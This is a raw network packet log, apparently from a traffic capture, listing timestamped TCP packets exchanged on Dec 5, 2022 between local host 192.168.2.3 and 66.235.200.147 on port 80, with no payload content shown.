Dec 5, 2022 01:32:37.767236948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767246008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767266989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767273903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767297029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767326117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767354965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767364979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767385006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767390966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767415047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767443895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767472029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767483950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767501116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767507076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767529964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767558098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767586946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767597914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767618895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767623901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767647982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767736912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767925024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767955065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767985106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768014908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768026114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768043995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768053055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768073082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768105030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768135071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768145084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768165112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768172979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768198013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768228054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768258095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768265963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768291950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768316984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768328905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768343925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768352985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768368959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768394947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768420935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768434048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768446922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768465996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768474102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768500090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768527031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768537998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768553019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768559933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.768578053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768604040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.768646002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.782802105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.782844067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.782891035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.782916069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.782927036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.782962084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.782969952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.782996893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783018112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783032894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783067942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783076048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783107042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783144951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783164024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783183098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783219099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783252001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783265114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783286095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783289909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783320904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783354044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783386946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783401012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783420086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783433914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783457994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783493996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783528090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783540010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783561945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783565998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783597946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783637047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783685923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783690929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783720016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783726931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783756018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783790112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783826113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783834934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783864975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783900976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783900976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783936024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.783938885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.783971071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784003973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784039021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784045935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784074068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784076929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784110069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784145117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784181118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784189939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784218073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784252882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784262896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784286976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784291983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784321070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784353971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784389019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784401894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784425020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784430027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784460068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784497023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784531116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784532070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784568071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784574986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784601927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784635067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784642935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784668922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784740925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784743071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784776926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784816980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784852982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784867048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784890890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784898996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784928083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784962893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.784970045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.784997940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785032034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785054922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785064936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785100937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785136938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785145044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785170078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785178900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785207033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785240889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785254002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785274982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785309076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785343885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785353899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785377979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785387993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785413980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785448074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785458088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785481930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785516024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785551071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785558939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785584927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785588026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785798073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785834074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785852909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785867929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785902023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785936117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785943031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.785969973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.785974026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786004066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786037922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786071062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786079884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786107063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786111116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786143064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786175966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786209106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786217928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786242962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786247015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786276102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786309958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786345005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786354065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786377907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786384106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786412954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786447048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786480904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786489964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786514997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786519051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786550045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786583900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786612034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786619902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786653996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786686897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786694050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786722898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786726952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786756992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786791086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786824942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786834002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786859035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786863089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.786911964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786948919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786982059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.786993980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787017107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787019968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787051916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787086964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787121058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787127018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787154913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787158966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787189007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787223101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787257910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787265062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787292004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787293911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787326097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787358999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787393093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787401915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787426949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787432909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787460089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787496090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787539959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787653923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787691116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787728071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787740946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787764072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787770987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787800074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787837029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787868023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787878036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787913084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787947893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787960052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.787983894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.787996054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788018942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788052082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788089037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788093090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788120985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788129091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788149118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788177967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788204908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788216114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788235903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788243055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788264036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788292885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788300991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788321972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788348913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788378000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788378000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788408041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788414001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788435936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788520098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788589001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788641930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788671017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788685083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788701057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788732052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788759947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788762093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788789034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788795948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788817883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788846970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788876057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788902044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788903952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788933039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788933992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788964033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.788971901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.788991928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789021969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789050102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789066076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789079905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789087057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789108992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789138079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789165020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789175034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789192915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789206028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789222956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789251089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789280891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789288998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789309978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789336920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789618015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789649010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789669991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789679050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789709091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789736986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789750099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789766073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789779902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.789794922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789824009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.789851904 CET	80	49705	66.235.200.147	192.168.2.3
